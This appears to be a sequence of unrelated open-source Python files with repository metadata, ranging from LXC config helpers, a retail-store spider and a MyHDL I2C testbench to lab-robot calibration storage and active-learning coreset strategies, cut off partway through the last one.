except configparser.NoOptionError:
cfg['rootfs'] = ''
try:
cfg['utsname'] = config.get('DEFAULT', cgroup['utsname'])
except configparser.NoOptionError:
cfg['utsname'] = ''
try:
cfg['arch'] = config.get('DEFAULT', cgroup['arch'])
except configparser.NoOptionError:
cfg['arch'] = ''
try:
cfg['ipv4'] = config.get('DEFAULT', cgroup['ipv4'])
except configparser.NoOptionError:
cfg['ipv4'] = ''
try:
cfg['memlimit'] = re.sub(r'[a-zA-Z]', '',
config.get('DEFAULT', cgroup['memlimit']))
except configparser.NoOptionError:
cfg['memlimit'] = ''
try:
cfg['swlimit'] = re.sub(r'[a-zA-Z]', '',
config.get('DEFAULT', cgroup['swlimit']))
except configparser.NoOptionError:
cfg['swlimit'] = ''
try:
cfg['cpus'] = config.get('DEFAULT', cgroup['cpus'])
except configparser.NoOptionError:
cfg['cpus'] = ''
try:
cfg['shares'] = config.get('DEFAULT', cgroup['shares'])
except configparser.NoOptionError:
cfg['shares'] = ''
if '%s.conf' % name in ls_auto():
cfg['auto'] = True
else:
cfg['auto'] = False
return cfg
def push_net_value(key, value):
'''
replace a var in the lxc-net config file
'''
filename = get_net_settings_fname()
if filename:
config = configparser.RawConfigParser()
config.readfp(FakeSection(open(filename)))
if not value:
config.remove_option('DEFAULT', key)
else:
config.set('DEFAULT', key, value)
with open(filename, 'wb') as configfile:
config.write(configfile)
DelSection(filename=filename)
load = open(filename, 'r')
read = load.readlines()
load.close()
i = 0
while i < len(read):
if ' = ' in read[i]:
split = read[i].split(' = ')
split[1] = split[1].strip('\n')
if '\"' in split[1]:
read[i] = '%s=%s\n' % (split[0].upper(), split[1])
else:
read[i] = '%s=\"%s\"\n' % (split[0].upper(), split[1])
i += 1
load = open(filename, 'w')
load.writelines(read)
load.close()
def push_config_value(key, value, container=None):
'''
replace a var in a container config file
'''
def save_cgroup_devices(filename=None):
'''
        returns the lxc.cgroup.devices.deny and lxc.cgroup.devices.allow
        entries as a list, because configparser cannot store duplicate keys
'''
if filename:
values = []
i = 0
load = open(filename, 'r')
read = load.readlines()
load.close()
while i < len(read):
if not read[i].startswith('#') and \
re.match('lxc.cgroup.devices.deny|'
'lxc.cgroup.devices.allow', read[i]):
values.append(read[i])
i += 1
return values
if container:
if os.geteuid():
filename = os.path.expanduser('~/.local/share/lxc/%s/config' %
container)
else:
filename = '/var/lib/lxc/%s/config' % container
save = save_cgroup_devices(filename=filename)
config = configparser.RawConfigParser()
config.readfp(FakeSection(open(filename)))
if not value:
config.remove_option('DEFAULT', key)
elif key == cgroup['memlimit'] or key == cgroup['swlimit'] \
and value is not False:
config.set('DEFAULT', key, '%sM' % value)
else:
config.set('DEFAULT', key, value)
# Bugfix (can't duplicate keys with config parser)
if config.has_option('DEFAULT', cgroup['deny']) or \
config.has_option('DEFAULT', cgroup['allow']):
config.remove_option('DEFAULT', cgroup['deny'])
config.remove_option('DEFAULT', cgroup['allow'])
with open(filename, 'wb') as configfile:
config.write(configfile)
DelSection(filename=filename)
with open(filename, "a") as configfile:
configfile.writelines(save)
def net_restart():
'''
restarts LXC networking
'''
cmd = ['/usr/sbin/service lxc-net restart']
try:
subprocess.check_call(cmd, shell=True)
return 0
except CalledProcessError:
return 1
|
74f8b117608f9ecda972df88621b67d98baa62d5
|
02b8727cb27298f8f0c0f0c4235045bcc9c290f9
|
/habanero/cn_formats.py
|
a6bb94b54b456f50c2839ce75b4fbb6e5ba98e50
|
[
"MIT"
] |
permissive
|
sckott/habanero
|
d97d678a39771b91941f6c4f4c2a4f6f410f8465
|
8cbe3a8f283f3bf3135459070022ad1324252a15
|
refs/heads/main
| 2023-09-01T02:46:52.231185
| 2023-07-27T21:51:28
| 2023-07-27T21:51:28
| 43,704,742
| 160
| 30
|
MIT
| 2023-09-13T13:03:58
| 2015-10-05T18:23:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,076
|
py
|
cn_formats.py
|
cn_formats = [
"rdf-xml",
"turtle",
"citeproc-json",
"citeproc-json-ish",
"text",
"ris",
"bibtex",
"crossref-xml",
"datacite-xml",
"bibentry",
"crossref-tdm",
]
cn_format_headers = {
"rdf-xml": "application/rdf+xml",
"turtle": "text/turtle",
"citeproc-json": "transform/application/vnd.citationstyles.csl+json",
"text": "text/x-bibliography",
"ris": "application/x-research-info-systems",
"bibtex": "application/x-bibtex",
"crossref-xml": "application/vnd.crossref.unixref+xml",
"datacite-xml": "application/vnd.datacite.datacite+xml",
"bibentry": "application/x-bibtex",
"crossref-tdm": "application/vnd.crossref.unixsd+xml",
}
cn_types = {
"rdf-xml": "text/xml",
"turtle": "text/plain",
"citeproc-json": "application/json",
"citeproc-json-ish": "application/json",
"text": "text/plain",
"ris": "text/plain",
"bibtex": "text/plain",
"crossref-xml": "text/xml",
"datacite-xml": "text/xml",
"bibentry": "text/plain",
"crossref-tdm": "text/xml",
}
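# A usage sketch (assumptions: the `requests` package is available and the
# public DOI resolver is reachable; the DOI below is an illustrative example):
if __name__ == "__main__":
    import requests
    # Ask the resolver for a BibTeX rendering via content negotiation.
    headers = {"Accept": cn_format_headers["bibtex"]}
    r = requests.get("https://doi.org/10.5555/12345678", headers=headers)
    # the response Content-Type is then expected to match cn_types["bibtex"]
    print(r.status_code, r.headers.get("Content-Type"))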
|
d6fbcf48b3bcbba76f9ef6b43566af61943caa4b
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/goldsmiths_gb.py
|
40d5ce6ddccfdb2bafbf5fbd059a3d6f99195c90
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,844
|
py
|
goldsmiths_gb.py
|
from scrapy import Spider
from scrapy.http import JsonRequest
from locations.dict_parser import DictParser
from locations.hours import OpeningHours
class GoldsmithsGBSpider(Spider):
name = "goldsmiths_gb"
item_attributes = {"brand": "Goldsmiths", "brand_wikidata": "Q16993095"}
start_urls = ["https://www.goldsmiths.co.uk/store-finder?q=&latitude=0&longitude=0&page=0"]
def parse(self, response, **kwargs):
for location in response.json()["results"]:
location["ref"] = location.pop("name")
location["address"]["street_address"] = ", ".join(
filter(None, [location["address"].get("line1"), location["address"].get("line2")])
)
location["address"]["country"] = location["address"]["country"]["isocode"]
location["phone"] = location["address"]["phone"]
location["email"] = location["address"]["email"]
item = DictParser.parse(location)
item["website"] = f'https://www.goldsmiths.co.uk/store/{item["ref"]}'
item["opening_hours"] = OpeningHours()
for rule in location["openingHours"]["weekDayOpeningList"]:
if rule["closed"]:
continue
item["opening_hours"].add_range(
rule["weekDay"],
rule["openingTime"]["formattedHour"],
rule["closingTime"]["formattedHour"],
time_format="%I:%M %p",
)
yield item
current_page = response.json()["pagination"]["currentPage"]
pages = response.json()["pagination"]["numberOfPages"]
if current_page < pages:
yield JsonRequest(
url=f"https://www.goldsmiths.co.uk/store-finder?q=&latitude=0&longitude=0&page={current_page+1}"
)
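# usage sketch (assuming the standard alltheplaces/Scrapy project layout):
# the spider would normally be run from the repository root with
#   scrapy crawl goldsmiths_gb -o goldsmiths_gb.json
# which pages through the store-finder API until `currentPage` reaches
# `numberOfPages`.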
|
f9fb7840aa8d13f262b44b35e8d7585c0d37fd2a
|
5599d46fdd4ecfa3a7d9ccb8e2aee648a5a0044c
|
/tests/tests/test_evaluate.py
|
ddaab032534b3db6e7824edb4de29501ce69875d
|
[] |
no_license
|
MrOlm/drep
|
552e95e7057bbe9550de832500fc51229b0bee27
|
27691e3d105693d7a42f2402366101c498186a27
|
refs/heads/master
| 2023-05-26T08:22:18.393677
| 2023-05-18T15:56:13
| 2023-05-18T15:56:13
| 69,408,336
| 200
| 44
| null | 2023-02-06T19:03:08
| 2016-09-27T23:55:43
|
Python
|
UTF-8
|
Python
| false
| false
| 2,774
|
py
|
test_evaluate.py
|
import os
import glob
import shutil
import pandas as pd
import importlib
import logging
import pytest
import tests.test_utils as test_utils
import drep
from drep import argumentParser
from drep.controller import Controller
from drep.WorkDirectory import WorkDirectory
@pytest.fixture()
def self():
self = test_utils.load_common_self()
yield self
self.teardown()
def test_tertiary_clustering_1(self):
'''
Test --run_tertiary_clustering fully
'''
test_dir = self.test_dir
# Check that wont run without dereplicate
args = drep.argumentParser.parse_args(
['compare', self.wd_loc, '--run_tertiary_clustering', '-g'] + self.genomes)
try:
drep.controller.Controller().parseArguments(args)
assert False
except ValueError:
pass
args = drep.argumentParser.parse_args(
['dereplicate', self.wd_loc, '--run_tertiary_clustering', '--ignoreGenomeQuality', '-g'] + self.genomes)
drep.controller.Controller().parseArguments(args)
# Load test results
wd = drep.WorkDirectory.WorkDirectory(self.wd_loc)
Cdb = wd.get_db('Cdb').sort_values('genome').reset_index(drop=True)
# Load solutions
wdS = drep.WorkDirectory.WorkDirectory(self.s_wd_loc)
CdbS = wdS.get_db('Cdb').sort_values('genome').reset_index(drop=True)
assert 'original_secondary_cluster' not in CdbS.columns
assert 'original_secondary_cluster' in Cdb.columns
def test_tertiary_clustering_2(self):
'''
Quick tests for --run_tertiary_clustering fully
'''
test_dir = self.test_dir
# Edit Cdb and Wdb
wd = drep.WorkDirectory.WorkDirectory(self.working_wd_loc)
Cdb = wd.get_db('Cdb')
Cdb['secondary_cluster'] = [c if g != 'Enterococcus_faecalis_T2.fna' else '1_3' for c, g in zip(Cdb['secondary_cluster'], Cdb['genome'])]
Wdb = wd.get_db('Wdb')
db = pd.DataFrame({'genome':['Enterococcus_faecalis_T2.fna'], 'cluster':['1_3'], 'score':[50]})
Wdb = pd.concat([Wdb, db])
assert len(Wdb) == 5
wd.store_db(Wdb, 'Wdb')
wd.store_db(Cdb, 'Cdb')
# Run tertiary clustering
args = drep.argumentParser.parse_args(
['dereplicate', self.working_wd_loc, '--run_tertiary_clustering', '--S_algorithm', 'ANImf', '-sa', '0.99', '-g'] + self.genomes)
drep.d_evaluate.d_evaluate_wrapper(args.work_directory, evaluate=['2'], **vars(args))
wd = drep.WorkDirectory.WorkDirectory(self.working_wd_loc)
Cdb = wd.get_db('Cdb').sort_values('genome').reset_index(drop=True)
Wdb = wd.get_db('Wdb').sort_values('genome').reset_index(drop=True)
assert len(Cdb['secondary_cluster'].unique()) == 4
assert len(Cdb['original_secondary_cluster'].unique()) == 5
assert len(Wdb) == 4
assert '1_1.3' in Cdb['secondary_cluster'].tolist()
|
8b349f14090c69347de153c92f10bedd447785c8
|
157d84f8aafc76ba9ea0dbbf08ede744966b4250
|
/tools/development/setup_test_agent.py
|
cd7c1ae73a4085ab024cdf37e85a670379297d8b
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
rancher/cattle
|
81d165a0339a41950561fe534c7529ec74203c56
|
82d154a53f4089fecfb9f320caad826bb4f6055f
|
refs/heads/v1.6
| 2023-08-27T20:19:31.989806
| 2020-05-01T18:15:55
| 2020-05-01T20:11:28
| 18,023,059
| 487
| 233
|
Apache-2.0
| 2022-01-03T18:07:33
| 2014-03-23T00:19:52
|
Java
|
UTF-8
|
Python
| false
| false
| 957
|
py
|
setup_test_agent.py
|
#!/usr/bin/env python
import cattle
def find_instance(instance):
hosts = instance.hosts()
if len(hosts) > 0:
return hosts[0].agent().uuid == 'test-agent'
return False
client = cattle.from_env()
UUID = 'docker0-agent-instance-provider'
nsp = client.list_network_service_provider(uuid=UUID)[0]
instances = filter(find_instance, nsp.instances())
if len(instances) != 1:
    raise Exception('Found {} instances, expect 1. Try running a container '
                    'first'.format(len(instances)))
account = instances[0].agent().account()
found = False
for cred in account.credentials():
if cred.kind == 'apiKey' and cred.publicValue == 'ai':
found = True
if not found:
print 'Creating credential for account', account.id
client.create_credential(accountId=account.id,
publicValue='ai',
secretValue='aipass',
kind='apiKey')
|
cfa7f1cd22909e05461fc27046544abe96b7e2e8
|
1ffa0900d91ff7dc76e933489d354252edc5dbb9
|
/gateware/sim/test_slow_adc.py
|
d39476383cdc8bdce5a148724647ebf8b070dd22
|
[] |
no_license
|
softerhardware/Hermes-Lite2
|
6b05ef86f83e2c2b83ae622d3867f790532bbce0
|
0a6e07c37a23cd3a8721b6c3089e28721c378883
|
refs/heads/master
| 2023-08-05T17:16:25.996884
| 2023-07-27T04:21:47
| 2023-07-27T04:21:47
| 74,639,005
| 177
| 82
| null | 2022-02-04T06:26:33
| 2016-11-24T04:53:08
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,517
|
py
|
test_slow_adc.py
|
#!/usr/bin/env python
from myhdl import *
import os
import i2c
module = 'slow_adc'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/i2c_master.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -g2012 -o %s.vvp %s" % (testbench, src)
verilogtb = """
`timescale 1ns / 1ps
/*
* Testbench for i2c_master
*/
module test_slow_adc;
// Parameters
// Inputs
reg clk = 0;
reg rst = 0;
reg [7:0] current_test = 0;
reg scl_i = 1;
reg sda_i = 1;
// Outputs
wire [11:0] ain0, ain1, ain2, ain3;
wire scl_o;
wire scl_t;
wire sda_o;
wire sda_t;
initial begin
// myhdl integration
$from_myhdl(
clk,
rst,
scl_i,
sda_i
);
$to_myhdl(
ain0,
ain1,
ain2,
ain3,
scl_o,
scl_t,
sda_o,
sda_t
);
// dump file
$dumpfile("test_slow_adc.lxt");
$dumpvars(0, test_slow_adc);
end
slow_adc UUT (
.clk(clk),
.rst(rst),
.ain0(ain0),
.ain1(ain1),
.ain2(ain2),
.ain3(ain3),
.scl_i(scl_i),
.scl_o(scl_o),
.scl_t(scl_t),
.sda_i(sda_i),
.sda_o(sda_o),
.sda_t(sda_t)
);
endmodule
"""
f = open(testbench+".v","w")
f.write(verilogtb)
f.close()
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
ain0 = Signal(intbv(0)[12:])
ain1 = Signal(intbv(0)[12:])
ain2 = Signal(intbv(0)[12:])
ain3 = Signal(intbv(0)[12:])
scl_i = Signal(bool(1))
sda_i = Signal(bool(1))
scl_o = Signal(bool(1))
scl_t = Signal(bool(1))
sda_o = Signal(bool(1))
sda_t = Signal(bool(1))
s1_scl_i = Signal(bool(1))
s1_sda_i = Signal(bool(1))
s1_scl_o = Signal(bool(1))
s1_scl_t = Signal(bool(1))
s1_sda_o = Signal(bool(1))
s1_sda_t = Signal(bool(1))
# I2C memory model 1
i2c_mem_inst1 = i2c.I2CModMem(1024)
i2c_mem_logic1 = i2c_mem_inst1.create_logic(
scl_i=s1_scl_i,
scl_o=s1_scl_o,
scl_t=s1_scl_t,
sda_i=s1_sda_i,
sda_o=s1_sda_o,
sda_t=s1_sda_t,
abw=1,
address=0x34,
latency=0,
name='slave1'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
ain0=ain0,
ain1=ain1,
ain2=ain2,
ain3=ain3,
scl_i=scl_i,
scl_o=scl_o,
scl_t=scl_t,
sda_i=sda_i,
sda_o=sda_o,
sda_t=sda_t
)
@always_comb
def bus():
# emulate I2C wired AND
##print(scl_o)
scl_i.next = scl_o & s1_scl_o;
sda_i.next = sda_o & s1_sda_o;
s1_scl_i.next = scl_o & s1_scl_o;
s1_sda_i.next = sda_o & s1_sda_o;
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
for i in range(0,20100):
yield clk.posedge
assert ain0==0x0708
assert ain1==0x090a
assert ain2==0x0b0c
assert ain3==0x0d0e
raise StopSimulation
return dut, i2c_mem_logic1, bus, clkgen, check
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
|
1922263dec3c33f098b31ceab79190b5379aac0c
|
cb3b27f0ed142ba31d73e44d7d3214c781b84eb6
|
/setup.py
|
df4098796e85d6dafb275b84d1d56610f7e8370f
|
[
"MIT"
] |
permissive
|
mpcabd/python-arabic-reshaper
|
879f08f1d28f5460a87d721f1289cc1dfe58f904
|
2990ceb11276a278849abc97f245aa3eb09173cc
|
refs/heads/master
| 2023-02-01T18:04:47.534010
| 2023-01-10T14:33:44
| 2023-01-10T14:33:44
| 4,286,622
| 372
| 83
|
MIT
| 2022-10-13T14:04:07
| 2012-05-10T15:57:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,558
|
py
|
setup.py
|
#!/usr/bin/env python
# coding=utf-8
from setuptools import setup
import io
import os
with io.open('README.md', 'r', encoding='utf-8') as fh:
long_description = fh.read()
setup(
name='arabic_reshaper',
description=('Reconstruct Arabic sentences to be used in'
' applications that do not support Arabic'),
long_description=long_description,
long_description_content_type='text/markdown',
version='3.0.0',
platforms='ALL',
license='MIT',
packages=['arabic_reshaper'],
extras_require={
'with-fonttools': ['fonttools>=4.0']
},
author='Abdullah Diab',
author_email='mpcabd@gmail.com',
maintainer='Abdullah Diab',
maintainer_email='mpcabd@gmail.com',
package_dir={'arabic_reshaper': 'arabic_reshaper'},
test_suite='arabic_reshaper.tests',
include_package_data=True,
keywords='arabic shaping reshaping reshaper',
url='https://github.com/mpcabd/python-arabic-reshaper/',
download_url=('https://github.com/mpcabd/'
'python-arabic-reshaper/tarball/master'),
classifiers=[
'Natural Language :: Arabic',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: 3.11',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
58bfe50a683c8dd71e4633887f79ec262f03ed1a
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/api/src/opentrons/calibration_storage/ot2/pipette_offset.py
|
83616a3737a85cd201129e914a4d324adfd912d5
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 4,005
|
py
|
pipette_offset.py
|
import json
import typing
import logging
from pydantic import ValidationError
from dataclasses import asdict
from opentrons import config, types
from .. import file_operators as io, types as local_types
from .models import v1
from opentrons.types import Mount, Point
from opentrons.util.helpers import utc_now
log = logging.getLogger(__name__)
# Delete Pipette Offset Calibrations
def delete_pipette_offset_file(pipette: str, mount: Mount) -> None:
"""
Delete pipette offset file based on mount and pipette serial number
:param pipette: pipette serial number
:param mount: pipette mount
"""
offset_dir = config.get_opentrons_path("pipette_calibration_dir")
offset_path = offset_dir / mount.name.lower() / f"{pipette}.json"
io.delete_file(offset_path)
def clear_pipette_offset_calibrations() -> None:
"""
Delete all pipette offset calibration files.
"""
io._remove_json_files_in_directories(
config.get_opentrons_path("pipette_calibration_dir")
)
# Save Pipette Offset Calibrations
def save_pipette_calibration(
offset: Point,
pip_id: str,
mount: Mount,
tiprack_hash: str,
tiprack_uri: str,
cal_status: typing.Optional[
typing.Union[local_types.CalibrationStatus, v1.CalibrationStatus]
] = None,
) -> None:
pip_dir = config.get_opentrons_path("pipette_calibration_dir") / mount.name.lower()
if isinstance(cal_status, local_types.CalibrationStatus):
cal_status_model = v1.CalibrationStatus(**asdict(cal_status))
elif isinstance(cal_status, v1.CalibrationStatus):
cal_status_model = cal_status
else:
cal_status_model = v1.CalibrationStatus()
pipette_calibration = v1.InstrumentOffsetModel(
offset=offset,
tiprack=tiprack_hash,
uri=tiprack_uri,
last_modified=utc_now(),
source=local_types.SourceType.user,
status=cal_status_model,
)
io.save_to_file(pip_dir, pip_id, pipette_calibration)
# Get Pipette Offset Calibrations
def get_pipette_offset(
pipette_id: str, mount: Mount
) -> typing.Optional[v1.InstrumentOffsetModel]:
try:
pipette_calibration_filepath = (
config.get_opentrons_path("pipette_calibration_dir")
/ mount.name.lower()
/ f"{pipette_id}.json"
)
return v1.InstrumentOffsetModel(
**io.read_cal_file(pipette_calibration_filepath)
)
except FileNotFoundError:
log.warning(f"Calibrations for {pipette_id} on {mount} does not exist.")
return None
except (json.JSONDecodeError, ValidationError):
log.warning(
f"Malformed calibrations for {pipette_id} on {mount}. Please factory reset your calibrations."
)
return None
def get_all_pipette_offset_calibrations() -> typing.List[v1.PipetteOffsetCalibration]:
"""
A helper function that will list all of the pipette offset
calibrations.
:return: A list of dictionary objects representing all of the
pipette offset calibration files found on the robot.
"""
pipette_calibration_dir = config.get_opentrons_path("pipette_calibration_dir")
pipette_calibration_list = []
for filepath in pipette_calibration_dir.glob("**/*.json"):
pipette_id = filepath.stem
mount = Mount.string_to_mount(filepath.parent.stem)
calibration = get_pipette_offset(pipette_id, mount)
if calibration:
pipette_calibration_list.append(
v1.PipetteOffsetCalibration(
pipette=pipette_id,
mount=mount.name.lower(),
offset=types.Point(*calibration.offset),
tiprack=calibration.tiprack,
uri=calibration.uri,
last_modified=calibration.last_modified,
source=calibration.source,
status=calibration.status,
)
)
return pipette_calibration_list
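# Hedged usage sketch, not part of the original Opentrons module, and assuming a
# configured robot workspace: a save/read round trip using only the helpers
# defined above. The serial number, tiprack hash and tiprack URI are
# illustrative assumptions.
# save_pipette_calibration(
#     offset=Point(0.0, 0.0, 0.0),
#     pip_id="P300-demo-serial",
#     mount=Mount.LEFT,
#     tiprack_hash="demo-tiprack-hash",
#     tiprack_uri="opentrons/opentrons_96_tiprack_300ul/1",
# )
# stored = get_pipette_offset("P300-demo-serial", Mount.LEFT)
# `stored` is an InstrumentOffsetModel, or None if the file is missing or malformed.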
|
7f4efed1d9815d01a3e9507021162d0289279bb1
|
749af8e81d5ccd2d8714a34434a9c77772df551b
|
/statsmodels/tools/catadd.py
|
8016ba9630ff693b631ca6869a863d292a012687
|
[
"BSD-3-Clause"
] |
permissive
|
statsmodels/statsmodels
|
98ca67192c08bcc611ed3a75edaded2c7181ab98
|
01b19d7d111b29c183f620ff0a949ef6391ff8ee
|
refs/heads/main
| 2023-09-05T13:05:49.497076
| 2023-09-01T10:54:50
| 2023-09-01T10:54:50
| 1,885,237
| 8,666
| 3,023
|
BSD-3-Clause
| 2023-09-13T17:51:48
| 2011-06-12T17:04:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
catadd.py
|
import numpy as np
def add_indep(x, varnames, dtype=None):
'''
construct array with independent columns
    x is either an iterable (list, tuple) or an instance of ndarray (or a
    subclass of it). If x is an ndarray, then each column is assumed to
    represent a variable with observations in rows.
'''
# TODO: this needs tests for subclasses
if isinstance(x, np.ndarray) and x.ndim == 2:
x = x.T
nvars_orig = len(x)
nobs = len(x[0])
if not dtype:
dtype = np.asarray(x[0]).dtype
xout = np.zeros((nobs, nvars_orig), dtype=dtype)
count = 0
rank_old = 0
varnames_new = []
varnames_dropped = []
keepindx = []
for (xi, ni) in zip(x, varnames):
xout[:, count] = xi
rank_new = np.linalg.matrix_rank(xout)
if rank_new > rank_old:
varnames_new.append(ni)
rank_old = rank_new
count += 1
else:
varnames_dropped.append(ni)
return xout[:, :count], varnames_new
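# Hedged usage sketch, not part of the original statsmodels module: dropping a
# linearly dependent column with add_indep. The values below are illustrative
# assumptions only.
# x = np.column_stack([np.ones(5), np.arange(5.0), 2 * np.arange(5.0)])
# xout, kept = add_indep(x, ['const', 'a', 'b'])
# xout.shape == (5, 2) and kept == ['const', 'a'], because column 'b' is an
# exact multiple of 'a' and does not increase the matrix rank.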
|
21d12c7d654f3963b1b5d7b24708a3f01b0af115
|
92d97211aebc18d62fdde441ea775198a231c362
|
/small_text/query_strategies/coresets.py
|
d7f7e0e7ab5a711e675d29a3fa9619d04d1c10d3
|
[
"MIT"
] |
permissive
|
webis-de/small-text
|
4a510bc4dd9a2110976121603bcc859581a5141c
|
2bb16b7413f85f3b933887c7054db45b5652d3a2
|
refs/heads/main
| 2023-09-03T06:00:20.976398
| 2023-08-19T18:28:43
| 2023-08-19T18:28:43
| 370,275,343
| 476
| 58
|
MIT
| 2023-08-23T20:54:25
| 2021-05-24T08:06:41
|
Python
|
UTF-8
|
Python
| false
| false
| 7,393
|
py
|
coresets.py
|
import warnings
import numpy as np
from sklearn.metrics import pairwise_distances
from small_text.query_strategies.strategies import EmbeddingBasedQueryStrategy
_DISTANCE_METRICS = ['cosine', 'euclidean']
def _check_coreset_size(x, n):
if n > x.shape[0]:
        raise ValueError(f'n (n={n}) is greater than the number of available samples (num_samples={x.shape[0]})')
def _cosine_distance(a, b, normalized=False):
sim = np.matmul(a, b.T)
if not normalized:
sim = sim / np.dot(np.linalg.norm(a, axis=1)[:, np.newaxis],
np.linalg.norm(b, axis=1)[np.newaxis, :])
return np.arccos(sim) / np.pi
def _euclidean_distance(a, b, normalized=False):
_ = normalized
return pairwise_distances(a, b, metric='euclidean')
def greedy_coreset(x, indices_unlabeled, indices_labeled, n, distance_metric='cosine',
batch_size=100, normalized=False):
"""Computes a greedy coreset [SS17]_ over `x` with size `n`.
Parameters
----------
x : np.ndarray
A matrix of row-wise vector representations.
indices_unlabeled : np.ndarray
Indices (relative to `dataset`) for the unlabeled data.
    indices_labeled : np.ndarray
        Indices (relative to `dataset`) for the labeled data.
n : int
Size of the coreset (in number of instances).
distance_metric : {'cosine', 'euclidean'}
Distance metric to be used.
batch_size : int
Batch size.
normalized : bool
If `True` the data `x` is assumed to be normalized,
otherwise it will be normalized where necessary.
Returns
-------
indices : numpy.ndarray
Indices relative to `x`.
References
----------
.. [SS17] Ozan Sener and Silvio Savarese. 2017.
Active Learning for Convolutional Neural Networks: A Core-Set Approach.
In International Conference on Learning Representations 2018 (ICLR 2018).
"""
_check_coreset_size(x, n)
num_batches = int(np.ceil(x.shape[0] / batch_size))
ind_new = []
if distance_metric == 'cosine':
dist_func = _cosine_distance
elif distance_metric == 'euclidean':
dist_func = _euclidean_distance
else:
raise ValueError(f'Invalid distance metric: {distance_metric}. '
f'Possible values: {_DISTANCE_METRICS}')
for _ in range(n):
indices_s = np.concatenate([indices_labeled, ind_new]).astype(np.int64)
dists = np.array([], dtype=np.float32)
for batch in np.array_split(x[indices_unlabeled], num_batches, axis=0):
dist = dist_func(batch, x[indices_s], normalized=normalized)
sims_batch = np.amin(dist, axis=1)
dists = np.append(dists, sims_batch)
dists[ind_new] = -np.inf
index_new = np.argmax(dists)
ind_new.append(index_new)
return np.array(ind_new)
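# Hedged usage sketch, not part of the original small-text module: calling
# greedy_coreset directly on synthetic embeddings. Shapes and values are
# illustrative assumptions chosen only to show the call signature defined above.
# rng = np.random.default_rng(0)
# x = rng.normal(size=(100, 16)).astype(np.float32)
# indices_labeled = np.array([0, 1])
# indices_unlabeled = np.arange(2, 100)
# chosen = greedy_coreset(x, indices_unlabeled, indices_labeled, n=10,
#                         distance_metric='euclidean')
# `chosen` holds 10 selected indices, picked one at a time by maximising the
# distance to the set selected so far.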
class GreedyCoreset(EmbeddingBasedQueryStrategy):
"""Selects instances by constructing a greedy coreset [SS17]_ over document embeddings.
"""
def __init__(self, distance_metric='euclidean', normalize=True, batch_size=100):
"""
Parameters
----------
distance_metric : {'cosine', 'euclidean'}
Distance metric to be used.
.. versionadded:: 1.2.0
normalize : bool
Embeddings will be normalized before the coreset construction if True.
batch_size : int
Batch size used for computing document distances.
.. note::
The default distance metric before v1.2.0 used to be cosine distance.
.. seealso::
Function :py:func:`.greedy_coreset`
Docstrings of the underlying :py:func:`greedy_coreset` method.
"""
if distance_metric not in set(_DISTANCE_METRICS):
raise ValueError(f'Invalid distance metric: {distance_metric}. '
f'Possible values: {_DISTANCE_METRICS}')
if distance_metric != 'cosine':
warnings.warn('Default distance metric has changed from "cosine" '
'to "euclidean" in v1.2.0. This warning will disappear in '
'v2.0.0.')
self.distance_metric = distance_metric
self.normalize = normalize
self.batch_size = batch_size
def sample(self, clf, dataset, indices_unlabeled, indices_labeled, y, n, embeddings,
embeddings_proba=None):
if self.normalize:
from sklearn.preprocessing import normalize
embeddings = normalize(embeddings, axis=1)
return greedy_coreset(embeddings, indices_unlabeled, indices_labeled, n,
distance_metric=self.distance_metric, normalized=self.normalize)
def __str__(self):
return f'GreedyCoreset(distance_metric={self.distance_metric}, ' \
f'normalize={self.normalize}, batch_size={self.batch_size})'
def lightweight_coreset(x, x_mean, n, normalized=False, proba=None):
"""Computes a lightweight coreset [BLK18]_ of `x` with size `n`.
Parameters
----------
x : np.ndarray
2D array in which each row represents a sample.
x_mean : np.ndarray
Elementwise mean over the columns of `x`.
n : int
Coreset size.
normalized : bool
If `True` the data `x` is assumed to be normalized,
otherwise it will be normalized where necessary.
proba : np.ndarray or None
        A probability distribution over `x`, which makes up half of the probability mass
        of the sampling distribution. If `proba` is `None`, a uniform distribution is used instead.
Returns
-------
indices : numpy.ndarray
Indices relative to `x`.
"""
_check_coreset_size(x, n)
sim = x.dot(x_mean)
if not normalized:
sim = sim / (np.linalg.norm(x, axis=1) * np.linalg.norm(x_mean))
dists = np.arccos(sim) / np.pi
dists = np.square(dists)
sum_dists = dists.sum()
if proba is None:
uniform = 0.5 * 1 / x.shape[0]
proba = uniform + 0.5 * dists / sum_dists
else:
